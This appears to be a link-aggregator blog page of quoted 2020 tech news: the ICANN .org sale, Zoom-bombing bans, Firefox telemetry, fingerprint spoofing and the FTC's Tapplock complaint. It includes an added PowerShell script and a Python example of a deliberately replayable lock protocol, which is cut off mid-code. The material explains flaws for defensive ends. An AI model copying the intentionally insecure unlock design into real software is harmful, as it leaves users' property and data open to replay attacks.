The Linkielist

Linking ideas with the world


ICANN suffers split-personality disorder as deadline for .org sale decision draws close

With just seven days left until it has to make a decision on the $1.13bn sale of the .org registry to a private equity firm, DNS overseer ICANN appears in chaos.

In a series of communications from senior executives, ICANN has embarked on a public negotiation with potential buyer Ethos Capital over the sale of the domain, while at the same time aggressively questioning its corporate structure.

A blog post from ICANN’s CEO Goran Marby late last week highlighted revised “public interest commitments” (PICs) that Ethos Capital had published as a way to resolve ongoing concerns over the sale, and gave the clear signal that ICANN is intending to approve the deal on April 20.

There has been a clear negotiation between the two sides: Marby’s post came one day after an email from Ethos’ lawyer (since published [PDF]) that noted the new changes were in direct response to a letter from ICANN sent just a few days earlier. “In making these changes, they specifically focused on changes that go to the clarity and enforceability of the PICs as you mentioned,” Ethos noted.

At the same time as it is moving forward on a deal, however, ICANN continues to dig [PDF] into Ethos Capital’s unusual corporate structure: something that critics say is no more than a corporate shell game designed to hide the true owners of the company.

ICANN is also looking at its financing of the deal, which financial experts have warned is typical of a debt-leveraged buyout where a founding firm is saddled with debt after the financiers walk away with a healthy profit.

Debt pile

“Can you please provide more detail on PIR’s current plans with respect to the repayment of the $360m term loan at the maturity date in light of Ethos Capital’s ten plus investment horizon for PIR?,” reads just one of dozens of pointed questions in a letter from ICANN to the company nominally in charge of .org, Public Interest Registry (PIR).

Another makes it plain that ICANN believes information is being hidden: “ICANN has specifically requested that PIR provide the entities and individuals that will ‘control’ PIR post-transaction as that is defined in PIR’s registry agreements. PIR has provided some information regarding share ownership but has not provided the specific information regarding ‘control’.”

There are no less than six different companies involved on the Ethos side of the transaction, all of them based in Delaware, a common base for shell companies, and all but one were incorporated on the same day, October 24, 2019.

In addition to Ethos Capital LLC, which was incorporated in May – the day after ICANN made it clear it was planning to remove price caps on .org domains in a decision worth tens of millions of dollars – there is also Ethos Purpose GP, LLC, and then four “Purpose Domains” companies: Purpose Domains Direct, Feeder, Holdings and Investments.

ICANN has asked for the directors of each of these companies and the structural connections between them, but from the published letters from Ethos and ICANN it is clear that Ethos has been withholding specific pieces of information.

Public interest

In addition to this mixed message, ICANN has still not outlined its decision-making process despite repeat calls from the internet community, including the world’s governments, to do so.

There is an obvious public interest in the sale of millions of .org domains but ICANN has repeatedly failed to say how or whether it will factor that in its decision. At a recent public meeting its general counsel failed to use the term “public interest” when discussing how a decision would be made; an omission that prompted the Governmental Advisory Committee (GAC) to pointedly note [PDF] that the ICANN Board had told it that “all options remain open and that the Board will consider the public interest in its decision-making.”

However, when PIR argued that ICANN only had grounds to reject the sale on issues of “security, reliability, or stability of services,” ICANN pushed back saying that it would not accept “any artificial restriction,” and noted “the obvious importance to the public interest of its operation.”

ICANN changes its tune, however, when other groups point to “public interest” as a key reason for denying the sale. In his most recent letter to the GAC [PDF], ICANN’s chair Maarten Botterman said that the organization “will apply a standard of reasonableness in making its determination on whether to provide or withhold its consent to the request.”

In a second sentence, he then notes that “the ICANN Board will continue to consider the public interest in all its decision-making using the totality of the information received.”

The difference between “apply” and “consider” is not lost on those watching the process; nor is the fact that ICANN has failed to define the term “reasonableness,” despite it now being the main factor of consideration.

[…]

Source: ICANN suffers split-personality disorder as deadline for .org sale decision draws close • The Register

Amazon hiring 75,000 more workers as demand rises due to coronavirus, after hiring 100k more last month

Amazon is hiring an additional 75,000 workers at its facilities, on top of the 100,000 new positions it created last month, the company said Monday.

In March, the company said it would hire additional warehouse and delivery workers across the country amid a surge in online shopping during the coronavirus outbreak. Since then, Amazon said it has hired more than 100,000 new employees and, as a result, is staffing up even more to help fulfill orders.

“We continue to see increased demand as our teams support their communities, and are going to continue to hire, creating an additional 75,000 jobs to help serve customers during this unprecedented time,” the company said.

As it continues to hire more workers, Amazon has also raised employees’ hourly pay and doubled overtime pay for warehouse workers. Through the end of April, warehouse and delivery workers can earn an additional $2 per hour in the U.S., 2 pounds per hour in the U.K., and approximately 2 euros per hour in many EU countries. Amazon currently pays $15 per hour or more in some areas of the U.S. for warehouse and delivery jobs.

Amazon has announced several benefits changes on top of the pay increases. The company has allowed workers to take unlimited unpaid time off and provides two weeks of paid leave for workers who tested positive for the virus or are in quarantine.

Amazon said it expects to continue investing in pay increases, benefits and safety improvements for warehouse and delivery workers. The company previously expected to spend $350 million on pay increases, but now estimates it will spend more than $500 million on those efforts.

Despite the pay increases and benefits changes, Amazon workers from at least three facilities have staged protests to call for the company to better protect workers amid the coronavirus outbreak. A dozen workers told CNBC they felt Amazon needed to provide employees with paid time off, among other concerns.

Source: Amazon hiring 75,000 more workers as demand rises due to coronavirus

Suspicious senate stock sale spurt spurs scrutiny scheme: This website tracks which shares US senators are unloading mid-pandemic

In the wake of reports last month that four US senators sold stocks shortly after a classified briefing on January 24 about the risk posed by the novel coronavirus, Timothy Carambat, a mechanical and software engineer, created a website to make stock sales by every senator more visible.

In an email to The Register, Carambat, who runs a design firm based in Covington, Louisiana, called Industrial Object, explained he was motivated to create Senate Stock Watcher after news broke that Senators Richard Burr (R-NC), Dianne Feinstein (D-CA), James Inhofe (R-OK), and Kelly Loeffler (R-GA) had dumped stocks before most people in America understood the implications of the outbreak. It is illegal for senators to buy and sell shares using non-public information.

Burr, chairman of the Senate Intelligence Committee, has been sued for alleged securities fraud, a charge he has denied. It is said he unloaded up to $1.7m in stocks in mid-February, particularly in hotel groups that would be later hit hard by the virus pandemic, all while receiving daily confidential briefings about the impact of the bio-nasty – and reassuring the public everything would be fine.

“As public servants, there are some senators making alarmingly large money movements at what would seem to be very fortunate timing in the market,” Carambat said.

“I understand some senators were previously very accomplished businesspeople, but in my opinion, the level of access they have to information currently is highly privileged and it would only make sense to keep their own financial best interests at heart.”

Details about the stock sales in news reports prompted Carambat to look into the source of the data, which turned out to be the US Senate Financial Disclosures website.

Source: Suspicious senate stock sale spurt spurs scrutiny scheme: This website tracks which shares US senators are unloading mid-pandemic • The Register

Twitter Obliterates Its Users’ Privacy Choices

The EFF’s staff technologist, also an engineer on Privacy Badger and HTTPS Everywhere, writes: Twitter greeted its users with a confusing notification this week. “The control you have over what information Twitter shares with its business partners has changed,” it said. The changes will “help Twitter continue operating as a free service,” it assured. But at what cost?

Twitter has changed what happens when users opt out of the “Allow additional information sharing with business partners” setting in the “Personalization and Data” part of its site. The changes affect two types of data sharing that Twitter does… Previously, anyone in the world could opt out of Twitter’s conversion tracking (type 1), and people in GDPR-compliant regions had to opt in. Now, people outside of Europe have lost that option. Instead, users in the U.S. and most of the rest of the world can only opt out of Twitter sharing data with Google and Facebook (type 2).

The article explains how last August Twitter discovered that its option for opting out of device-level targeting and conversion tracking “did not actually opt users out.” But after fixing that bug, “advertisers were unhappy. And Twitter announced a substantial hit to its revenue… Now, Twitter has removed the ability to opt out of conversion tracking altogether.”

While users in Europe are protected by GDPR, “users in the United States and everywhere else, who don’t have the protection of a comprehensive privacy law, are only protected by companies’ self-interest…” BoingBoing argues that Twitter “has just unilaterally obliterated all its users’ privacy choices, announcing the change with a dialog box whose only button is ‘OK.’”

Source: Twitter Accused of Obliterating Its Users’ Privacy Choices – Slashdot

Mozilla installs Scheduled Telemetry Task on Windows with Firefox 75 – if you had put telemetry on

Observant Firefox users on Windows who have updated the web browser to Firefox 75 may have noticed that the upgrade brought along with it a new scheduled task. The scheduled task is also added if Firefox 75 is installed on a Windows device.

The task’s name is Firefox Default Browser Agent and it is set to run once per day. Mozilla published a post on the organization’s official blog with information on the task and why it has been created.

[Screenshot: the Firefox Default Browser Agent task]

According to Mozilla, the task has been created to help the organization “understand changes in default browser settings”. At its core, it is a Telemetry task that collects information and sends the data to Mozilla.

Here are the details:

  • The Task is only created if Telemetry is enabled. If Telemetry is set to off (in the most recently used Firefox profile), it is not created and thus no data is sent. The same is true for Enterprise telemetry policies if they are configured. Update: Some users report that the task is created while Telemetry was set to off on their machine.
  • Mozilla collects information “related to the system’s current and previous default browser setting, as well as the operating system locale and version”.
  • Mozilla notes that the data cannot be “associated with regular profile based telemetry data”.
  • The data is sent to Mozilla every 24 hours using the scheduled task.

Mozilla added the file default-browser-agent.exe to the Firefox installation folder on Windows which defaults to C:\Program Files\Mozilla Firefox\.

Firefox users have the following options if they don’t want the data sent to Mozilla:

  • Firefox users who opted out of Telemetry are fine; they don’t need to make any change, as the new Telemetry data is not sent to Mozilla. This applies to users who opted out of Telemetry in Firefox or used Enterprise policies to do so.
  • Firefox users who have Telemetry enabled can either opt out of Telemetry or deal with the task/executable that is responsible.

Disable the Firefox Default Browser Agent task

[Screenshot: the Firefox Default Browser Agent task disabled in Task Scheduler]

Here is how you disable the task:

  1. Open Start on the Windows machine and type Task Scheduler.
  2. Open the Task Scheduler and go to Task Scheduler Library > Mozilla.
  3. There you should find listed the Firefox Default Browser Agent task.
  4. Right-click on the task and select Disable.
  5. Note: Nightly users may see the Firefox Nightly Default Browser Agent task there as well and may disable it.

The task won’t be executed anymore once it is disabled.
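The same procedure can be carried out from an elevated PowerShell prompt, which is handier on machines you administer remotely. The script below is an added example, not code from the gHacks article or from Mozilla: it lists the tasks under Task Scheduler Library > Mozilla, shows which executable each one runs, disables every “Default Browser Agent” task (stable and Nightly) and, as an extra check, looks for the Firefox enterprise policy that turns Telemetry off. The cmdlets are from Windows’ built-in ScheduledTasks module; the policy name DisableTelemetry and its HKLM registry location are Mozilla’s documented policy settings and are an assumption not taken from the article.

```powershell
# Added example (not from the gHacks article): inspect and disable the
# "Firefox Default Browser Agent" scheduled task that Firefox 75 registers
# under Task Scheduler Library > Mozilla. Run from an elevated PowerShell.

# 1. List every task under \Mozilla\ (Nightly installs add a second task there).
$tasks = Get-ScheduledTask -TaskPath '\Mozilla\' -ErrorAction SilentlyContinue
if (-not $tasks) {
    Write-Host 'No tasks found under \Mozilla\ (task not created, or Firefox older than 75).'
    return
}
$tasks | Select-Object TaskName, State | Format-Table -AutoSize

# 2. Show the executable each task runs; the article says it should be
#    default-browser-agent.exe in the Firefox install folder
#    (C:\Program Files\Mozilla Firefox\ by default).
foreach ($t in $tasks) {
    $action = $t.Actions | Select-Object -First 1
    Write-Host ('{0}: {1} {2}' -f $t.TaskName, $action.Execute, $action.Arguments)
}

# 3. Disable every "Default Browser Agent" task (stable and Nightly).
#    The task stays registered but no longer fires on its daily trigger.
$tasks |
    Where-Object { $_.TaskName -like '*Default Browser Agent*' } |
    Disable-ScheduledTask |
    Select-Object TaskName, State

# 4. Optional: check whether the Firefox enterprise policy that disables
#    Telemetry is present. The DisableTelemetry policy and the HKLM path are
#    Mozilla's documented policy registry location (assumption, not from the article).
$policyKey = 'HKLM:\SOFTWARE\Policies\Mozilla\Firefox'
$policy = Get-ItemProperty -Path $policyKey -Name DisableTelemetry -ErrorAction SilentlyContinue
if ($policy -and $policy.DisableTelemetry -eq 1) {
    Write-Host 'Enterprise policy DisableTelemetry=1 is set; the agent task should not be created.'
} else {
    Write-Host 'No DisableTelemetry policy found; Telemetry follows the profile setting.'
}
```

Step 3 disables rather than deletes the task, so a later Firefox update that re-registers it is easy to spot by re-running step 1: a task that has come back to the Ready state is the signal to look at the Telemetry setting again.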

Closing Words

The new Telemetry task is only introduced on Windows and runs only if Telemetry is enabled (which it is by default [NOTE: Is it? I don’t think so! It asks at install!]). Mozilla is transparent about the introduction and while that is good, I’d have preferred it if the company had informed users about it in the browser after the upgrade to Firefox 75 or installation of the browser, and before the task is executed for the first time.

Source: Mozilla installs Scheduled Telemetry Task on Windows with Firefox 75 – gHacks Tech News

Go to about:telemetry in Firefox to see what it’s collecting. In my case this was none, because when FF was installed it asked me whether I wanted it on or off and I said off.

Cannonball Record Broken During Coronavirus – 26 Hours 38 Minutes

Only a few months have passed since we reported that the New York-to-Los Angeles Cannonball record was broken. It’s allegedly been broken again. The 26 hour, 38 minute time—which beats the record set in November by more than 45 minutes—appears to be legitimate, according to Ed Bolian, a Cannonball insider and driver who set his own 28 hour, 50 minute record in 2013. Alex Roy, who set the first modern NYC-to-LA record in 2006, also said the new claim is credible based on his analysis of multiple sources.

“It was not me,” Bolian was quick to point out to Road & Track, eager to quell an Internet-generated rumor that perhaps he had been the one to pull it off.

All we know about this new set of scofflaws is that there were three, maybe four of them, and that they were driving a white 2019 Audi A8 sedan with a pair of red plastic marine fuel tanks ratchet-strapped into its trunk. They started at the Red Ball Garage in New York City at 11:15 pm on April 4, and ended less than 27 hours later at the Portofino Hotel & Marina in Redondo Beach, California, the traditional start and end points of a Cannonball attempt.

We also know that their timing was awful. It doesn’t seem likely that the new record-holders were keen to have news reach the public so soon, especially at a time when so many people are understandably on edge. But an exuberant friend posted a picture of the Audi on Facebook this week—situated among a number of other high-dollar cars, with its trunk open to show the auxiliary fuel tanks—along with the team’s alleged time. Within a day, hundreds of people had shared the post, and social media chat groups were abuzz with Cannonball aficionados offering up opinions on the matter.

Source: Cannonball Record Broken During Coronavirus – 26 Hours 38 Minutes

There’s some whining about it being in poor taste or something. Whatever.

The US Senate reportedly advised members to stop using Zoom

US senators have been advised not to use videoconferencing platform Zoom over security concerns, the Financial Times reports.

According to three people briefed on the matter, the Senate sergeant-at-arms – whose job it is to run law enforcement and security on the Capitol – told senators to find alternative methods for remote working, although he did not implement an outright ban.

With the coronavirus outbreak forcing millions to work from home, Zoom has seen a 1,900% increase in use between December and March to 200 million daily users. This has been accompanied by a string of bad press about its security and privacy practices, to the point where CEO Eric Yuan was forced to publicly apologize last week.

This week the company admitted to “mistakenly” routing data through China in a bid to secure more server space to deal with skyrocketing demand. “We failed to fully implement our usual geo-fencing best practices. As a result, it is possible certain meetings were allowed to connect to systems in China, where they should not have been able to connect,” Yuan said.

The news sparked outrage among some senators, and Senate Democrat Richard Blumenthal called for the FTC to launch an investigation into the company.

“As Zoom becomes embedded in Americans’ daily lives, we urgently need a full & transparent investigation of its privacy and security,” the senator tweeted.

The slew of privacy issues has also prompted the Taiwanese government to ban its officials from using Zoom, and Google banned use of the app on work computers due to its “security vulnerabilities.”

While the Senate has told its members to stay away from Zoom, the Pentagon told the FT that it would continue to allow its staff to use the platform. A memo sent to top cybersecurity officials from the Department of Homeland Security said that the company was being responsive when questioned about concerns over the security of its software, Reuters reported.

Source: The US Senate reportedly advised members to stop using Zoom

Singapore stops teachers using Zoom app after ‘very serious incidents’ (Zoom bombing)

Singapore has suspended the use of video-conferencing tool Zoom by teachers after “very serious incidents” in the first week of a coronavirus lockdown that has seen schools move to home-based learning.

[File photo: Zoom logo in front of a displayed coronavirus disease (COVID-19) illustration, taken March 19, 2020. REUTERS/Dado Ruvic/Illustration]

One incident involved obscene images appearing on screens and strange men making lewd comments during the streaming of a geography lesson with teenage girls, media said.

Zoom Video Communications Inc (ZM.O) has faced safety and privacy concerns over its conferencing app, use of which has surged in offices and schools worldwide after they shut to try and curb virus infections.

“These are very serious incidents,” Aaron Loh of the education ministry’s technology division said on Friday, without giving details.

“The Ministry of Education (MOE) is currently investigating both breaches and will lodge a police report if warranted.

“As a precautionary measure, our teachers will suspend their use of Zoom until these security issues are ironed out.”

Loh said the ministry would further advise teachers on security protocols, such as requiring secure log-ins and not sharing the meeting link beyond the students in the class.

Source: Singapore stops teachers using Zoom app after ‘very serious incidents’ – Reuters

After 50 Years of Effort, Researchers Made Silicon Emit Light, could improve computer speeds vastly

Modern transistors, which function as a computer’s brain cells, are only a few atoms long. If they are packed too tightly, that can cause all sorts of problems: electron traffic jams, overheating, and strange quantum effects. One solution is to replace some electronic circuits with optical connections that use photons instead of electrons to carry data around a chip. There’s just one problem: Silicon, the main material in computer chips, is terrible at emitting light.

Now, a team of European researchers says they have finally overcome this hurdle. On Wednesday, a research team led by Erik Bakkers, a physicist at Eindhoven University of Technology in the Netherlands, published a paper in Nature that details how they grew silicon alloy nanowires that can emit light. It’s a problem that physicists have grappled with for decades, but Bakkers says his lab is already using the technique to develop a tiny silicon laser that can be built into computer chips. Integrating photonic circuits on conventional electronic chips would enable faster data transfer and lower energy consumption without raising the chip’s temperature, which could make it particularly useful for data-intensive applications like machine learning.

“It’s a big breakthrough that they were able to demonstrate light emission from nanowires made of a silicon mixture, because these materials are compatible with the fabrication processes used in the computer chip industry,” says Pascal Del’Haye, who leads the microphotonics group at the Max Planck Institute for the Science of Light and was not involved in the research. “In the future, this might enable the production of microchips that combine both optical and electronic circuits.”

Source: After 50 Years of Effort, Researchers Made Silicon Emit Light | WIRED

Stanislascollege Pijnacker also stops using Zoom because of ‘images that are beyond the pale’: porn and a Hitler moustache during German class

PIJNACKER – The Stanislascollege in Pijnacker is stopping the use of the video app Zoom for online lessons with immediate effect. The school has received several reports from pupils, parents and teachers that images or texts that are beyond the pale were shown during lessons.

On Wednesday the Erasmus College in Zoetermeer also decided to stop using Zoom immediately, after pupils were shown pornographic images during an online lesson. The Stanislascollege has six schools, spread across Delft, Pijnacker and Rijswijk.

‘In most cases the images or texts appear to have been shown by people who are not connected to the school and who gained unlawful access to the lesson,’ the school writes in a letter to parents.

Hitler moustache during German class

According to regional director Fons Loogman of Stichting Lucas Onderwijs, which the Stanislascollege falls under, there have been minor incidents. ‘Pupils forward an invitation link to third parties, who can then also watch the lesson; you have no control over that. For example, during a German lesson a Hitler salute or a Hitler moustache was shown at some point.’

The incident with pornographic images in Zoetermeer was, however, what tipped the balance for the school in Pijnacker to stop using Zoom. ‘On top of that, over the past week we had already been alerted to reports from the IT world that Zoom is not secure. For instance, they collect information, there are insecure security structures and it is easy to hack,’ Loogman says.

Source: Stanislascollege Pijnacker also stops using Zoom because of ‘images that are beyond the pale’ – Omroep West

Porn during an online lesson at a Zoetermeer school, so it stops using Zoom

ZOETERMEER – Pupils in a class at the Erasmus College in Zoetermeer were shown pornographic images on Wednesday morning during a lesson via the video app Zoom. The school has immediately stopped using Zoom.

‘We understand that you are extremely shocked,’ the school writes in an email to the pupils concerned. ‘We have of course stopped all Zoom lessons straight away and will look at another method for teaching from home.’

Director Roderik Rot confirms that pornographic images were shown and that all lessons were stopped for that reason. ‘Yes, there was one class in which that briefly happened.’ Rot cannot say how many pupils were involved: ‘A class never consists of more than thirty pupils, and in these online lessons it is usually the case that not all pupils are present.’ Asked which lesson it was, he declines to answer for privacy reasons. The school offered pupils the option of contacting a support team if they wished, but as far as is known nobody has made use of it.

Online lessons stopped

The Erasmus College has therefore now stopped using Zoom at once. According to Rot, the school had already set that in motion. An external privacy adviser had already said that Zoom could be used under strict conditions, but that he nevertheless recommended other programs. ‘So yesterday we notified all the parents that we are switching to something else, and that we are busy with that.’

[…]

IDs shared insecurely

According to the Delft cybersecurity company Fox-IT, it is unlikely that Zoom itself has been hacked. Security expert Sanne Maasakkers: ‘Zoom is a very large software company where many people work on security every day.’ According to Maasakkers, it is more plausible that invitation codes ended up in the hands of people who were not invited to the meeting.

Every participant gets such an ID. If it is not protected with a password, outsiders can break into a Zoom meeting, which is much harder with a password, unless a participant has themselves been hacked.

Source: Porn during an online lesson at a Zoetermeer school: ‘Unlikely that Zoom has been hacked’ – Omroep West

No, it wasn’t really ‘hacked’ in the sense that its security is so bad that you can just enter an ID and randomly send porn to it.

Trump signs executive order to support moon mining, tap asteroid resources

The water ice and other lunar resources that will help the United States establish a long-term human presence on the moon are there for the taking, the White House believes.

President Donald Trump signed an executive order today (April 6) establishing U.S. policy on the exploitation of off-Earth resources. That policy stresses that the current regulatory regime — notably, the 1967 Outer Space Treaty — allows the use of such resources.

This view has long held sway in U.S. government circles. For example, the United States, like the other major spacefaring nations, has not signed the 1979 Moon Treaty, which stipulates that non-scientific use of space resources be governed by an international regulatory framework. And in 2015, Congress passed a law explicitly allowing American companies and citizens to use moon and asteroid resources.

The new executive order makes things even more official, stressing that the United States does not view space as a “global commons” and sees a clear path to off-Earth mining, without the need for further international treaty-level agreements.

The executive order, called “Encouraging International Support for the Recovery and Use of Space Resources,” has been in the works for about a year, a senior administration official said during a teleconference with reporters today. The order was prompted, at least in part, by a desire to clarify the United States’ position as it negotiates with international partners to help advance NASA’s Artemis program for crewed lunar exploration, the official added. (Engagement with international partners remains important, the official said.)

Artemis aims to land two astronauts on the moon in 2024 and to establish a sustainable human presence on and around Earth’s nearest neighbor by 2028. Lunar resources, especially the water ice thought to be plentiful on the permanently shadowed floors of polar craters, are key to Artemis’ grand ambitions, NASA officials have said.

The moon is not the final destination for these ambitions, by the way. Artemis is designed to help NASA and its partners learn how to support astronauts in deep space for long stretches, lessons that will be key to putting boots on Mars, which NASA wants to do in the 2030s.

“As America prepares to return humans to the moon and journey on to Mars, this executive order establishes U.S. policy toward the recovery and use of space resources, such as water and certain minerals, in order to encourage the commercial development of space,” Scott Pace, deputy assistant to the president and executive secretary of the U.S. National Space Council, said in a statement today.

President Trump has shown considerable interest in shaping U.S. space policy. In December 2017, for example, he signed Space Policy Directive-1, which laid the groundwork for the Artemis campaign. Two other directives have aimed to streamline commercial space regulation and the protocols for space traffic control. And Space Policy Directive-4, which the president signed in February 2019, called for the creation of the Space Force, the first new U.S. military branch since the Air Force was stood up in 1947.

Source: Trump signs executive order to support moon mining, tap asteroid resources | Space

Attackers can bypass fingerprint authentication with an ~80% success rate

For decades, the use of fingerprints to authenticate users to computers, networks, and restricted areas was (with a few notable exceptions) mostly limited to large and well-resourced organizations that used specialized and expensive equipment. That all changed in 2013 when Apple introduced TouchID. Within a few years, fingerprint-based validation became available to the masses as computer, phone, and lock manufacturers added sensors that gave users an alternative to passwords when unlocking the devices.

Although hackers managed to defeat TouchID with a fake fingerprint less than 48 hours after the technology was rolled out in the iPhone 5S, fingerprint-based authentication over the past few years has become much harder to defeat. Today, fingerprints are widely accepted as a safe alternative over passwords when unlocking devices in many, but not all, contexts.

A very high probability

A study published on Wednesday by Cisco’s Talos security group makes clear that the alternative isn’t suitable for everyone—namely those who may be targeted by nation-sponsored hackers or other skilled, well-financed, and determined attack groups. The researchers spent about $2,000 over several months testing fingerprint authentication offered by Apple, Microsoft, Samsung, Huawei, and three lock makers. The result: on average, fake fingerprints were able to bypass sensors at least once roughly 80 percent of the time.

The percentages are based on 20 attempts for each device with the best fake fingerprint the researchers were able to create. While Apple products limit users to five attempts before asking for the PIN or password, the researchers subjected the devices to 20 attempts (that is, multiple groups of one or more attempts). Of the 20 attempts, 17 were successful. Other products tested permitted significantly more or even an unlimited number of unsuccessful tries.

Tuesday’s report was quick to point out that the results required several months of painstaking work, with more than 50 fingerprint molds created before getting one to work. The study also noted that the demands of the attack—which involved obtaining a clean image of a target’s fingerprint and then getting physical access to the target’s device—meant that only the most determined and capable adversaries would succeed.

“Even so, this level of success rate means that we have a very high probability of unlocking any of the tested devices before it falls back into the PIN unlocking,” Talos researchers Paul Rascagneres and Vitor Ventura wrote. “The results show fingerprints are good enough to protect the average person’s privacy if they lose their phone. However, a person that is likely to be targeted by a well-funded and motivated actor should not use fingerprint authentication.”

Source: Attackers can bypass fingerprint authentication with an ~80% success rate | Ars Technica

Google Bans Zoom Videoconferencing Software From Employees’ Computers

Google has banned the popular videoconferencing software Zoom from its employees’ devices, BuzzFeed News has learned. Zoom, a competitor to Google’s own Meet app, has seen an explosion of people using it to work and socialize from home and has become a cultural touchstone during the coronavirus pandemic.

Last week, Google sent an email to employees whose work laptops had the Zoom app installed that cited its “security vulnerabilities” and warned that the videoconferencing software on employee laptops would stop working starting this week.

“We have long had a policy of not allowing employees to use unapproved apps for work that are outside of our corporate network,” Jose Castaneda, a Google spokesperson, told BuzzFeed News. “Recently, our security team informed employees using Zoom Desktop Client that it will no longer run on corporate computers as it does not meet our security standards for apps used by our employees. Employees who have been using Zoom to stay in touch with family and friends can continue to do so through a web browser or via mobile.”

Source: Google Bans Zoom Videoconferencing Software From Employees’ Computers

Germany Flies in Seasonal Farm Workers Amid COVID-19 Efforts – yeah I thought they wanted to keep out the immigrants or something?

Two planeloads of Eastern European farmhands arrived Thursday in Berlin and Duesseldorf amid strict precautions to protect the country from the new coronavirus, as an ambitious German program to import thousands of seasonal agricultural workers got underway.

Seasonal workers had been caught up in the country’s ban on travel after the outbreak of the coronavirus. That left a massive deficit in personnel available to pick asparagus, which has already sprouted, and plant other crops in German fields, where some 300,000 such workers were employed last year.

Most came from Eastern European countries such as Romania, Bulgaria, Ukraine, and Hungary, where wages are much lower than in Germany, which is Europe’s largest economy.

Under the new program, workers need to fly to the country in controlled groups — to prevent the possible infection of others en route — and are subject to medical checks upon arrival. They then must live and work separately from other farmhands for two weeks, and wear protective gear.

Announcing the program, Agriculture Minister Julia Kloecker said it was a “pragmatic and goal-oriented solution” that would allow up to 40,000 seasonal workers into the country in April, and another 40,000 in May. She said the hope was to find an additional 20,000 over the two months among Germany’s own unemployed, students or resident asylum seekers.

“This is important and good news for our farmers,” she said. “Because the harvest doesn’t wait and you can’t delay sowing the fields.”

Ahead of time, interested workers have to register online and have their information checked by federal police. Farmers needing help register online with Eurowings, the airline contracted to bring the workers in, saying when they’re needed and where.

So far, 9,900 people had registered for April and another 4,300 for May.

Flights are then organized to bring in groups, and the first group of workers, 530 people from Romania, arrived on Thursday in Duesseldorf and Berlin, Eurowings said. Further flights were already planned to Duesseldorf, Karlsruhe, Leipzig, Nuremberg and Frankfurt.

Source: Germany Flies in Seasonal Farm Workers Amid COVID-19 Efforts | Time

Rocket Lab proves it can recover a rocket in mid-air by catching it with a helicopter

Last year, Rocket Lab announced that it would attempt to reuse the first stage of its Electron rocket. The company’s goal is to catch the stage as it falls back towards the ocean by plucking it out of mid-air with a helicopter. While that’s ambitious, a video released today shows that Rocket Lab may not be too far off. The clip shows one helicopter dropping an Electron test stage and another hooking the stage’s parachute with a grappling hook and towing it back to land.

Rocket Lab pulled off this stunt in early March. One helicopter dropped the Electron test stage over open ocean in New Zealand. A second helicopter caught it, on the first attempt, at around 5,000 feet.

Next, Rocket Lab will attempt to recover a full Electron first stage following a launch. It won’t pull that from the air but will retrieve the rocket stage after it lands in the ocean. A parachute will help slow its descent, and like previous versions, it will include instrumentation to “inform future recovery efforts.” That mission is planned for late 2020.

Of course, catching a rocket stage after an actual launch is a lot different than catching one that’s dropped neatly by a helicopter. But the feat is a key milestone, as Rocket Lab’s plans to reuse the rockets depend on this recovery method. If it’s successful, Rocket Lab will be able to lower costs, and in theory, that may lead to more launches.

Source: Rocket Lab proves it can recover a rocket in mid-air | Engadget

Easy-to-pick “smart” locks gush personal data, FTC finds

A padlock—whether it uses a combination, a key, or “smart” tech—has exactly one job: to keep your stuff safe so other people can’t get it. Tapplock, Inc., based in Canada, produces such a product. The company’s locks unlock with a fingerprint or an app connected by Bluetooth to your phone. Unfortunately, the Federal Trade Commission said, the locks are full of both digital and physical vulnerabilities that leave users’ stuff, and data, at risk.

The FTC’s complaint (PDF) against Tapplock, released Monday, basically alleges that the company misrepresented itself, because it marketed its products as secure and tested when they were neither. A product—any product—simply being kind of crappy doesn’t necessarily fall under the FTC’s purview. Saying untrue things about your product in your advertisement or privacy policy, however, will make the commission very unhappy with you indeed.

“We allege that Tapplock promised that its Internet-connected locks were secure, but in fact the company failed to even test if that claim was true,” Andrew Smith, director of the FTC’s Bureau of Consumer Protection, said in a written statement. “Tech companies should remember the basics—when you promise security, you need to deliver security.”

Tapplock’s advertisements say its flagship product, the Tapplock One, can store up to 500 user fingerprints and can be connected to an “unlimited” number of devices through the app—a design optimized for something many people need to be able to access and for which handing off a physical key is impractical. To make the $99 lock work, Tapplock collects a great deal of personal information on its users, including usernames, email addresses, profile photos, location history, and the precise location of a user’s lock.

[…]

The lock may be built with “7mm reinforced stainless steel shackles, strengthened by double-layered lock design with anti-shim and anti-pry technologies,” as Tapplock’s website promises, but according to the FTC, perhaps it should have considered anti-screwdriver technologies. As it turns out, a researcher was able to unlock the lock “within a matter of seconds” by unscrewing the back panel. Oops.

The complaint also pointed to several “reasonably foreseeable” software vulnerabilities that the FTC alleges Tapplock could have avoided if the company “had implemented simple, low-cost steps.”

One vulnerability security researchers identified allowed a user to bypass the account authentication process entirely in order to gain full access to the account of literally any Tapplock user, including their personal information. And how could this happen? “A researcher who logged in with a valid user credential could then access another user’s account without being re-directed back to the login page, thereby allowing the researcher to circumvent Respondent’s authentication procedures altogether,” the complaint explains.

A second vulnerability allowed researchers the ability to access and unlock any lock they could get close enough to with a working Bluetooth connection. That’s because Tapplock “failed to encrypt the Bluetooth communication between the lock and the app,” leaving the data wide open for the researchers to discover and replicate.

The third vulnerability outlined in the complaint also has to do with a failure to secure communication data. That app that allows “unlimited” connections? The primary owner can of course add and revoke authorized users from the lock. But someone whose access was revoked could still access the lock because the vulnerability allowed for sniffing out the relevant data packets.
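The second and third weaknesses above come down to the same design flaw: an unlock message that is identical every time and sent in the clear, so anyone who captured it can resend it, and a lock that has no way of knowing that a user was revoked. The following is an added illustration of that flaw beside the usual remedy; it is not Tapplock's code and nothing from the FTC complaint. The toy lock on the left accepts a static unlock command; the one on the right issues a fresh random challenge and accepts only an HMAC of that challenge under a per-user key, which the lock deletes when the owner revokes the user. The class names and the user "guest" are assumptions for the example.

```python
"""Replayable static unlock versus challenge-response with revocation.

Added illustration, not Tapplock's code or anything from the FTC
complaint. Class and user names are assumptions for the example.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional


class ReplayableLock:
    """Weak design: the unlock message is a fixed byte string sent in
    the clear. Whoever captured it once can resend it forever, and the
    lock has no notion of which user is asking, so revoking a user in
    the app changes nothing on the lock itself."""

    def __init__(self, unlock_token: bytes) -> None:
        self.unlock_token = unlock_token

    def handle(self, message: bytes) -> bool:
        return hmac.compare_digest(message, self.unlock_token)


class ChallengeResponseLock:
    """Hardened design: every authorized user has a per-user secret key
    stored on the lock. To unlock, the lock hands out a fresh random
    nonce and accepts only HMAC-SHA256(key, nonce) from a user whose key
    is still present. Revocation deletes the key, so a revoked phone
    cannot answer new challenges, and captured answers are useless
    because they are bound to a nonce that is never issued again."""

    def __init__(self) -> None:
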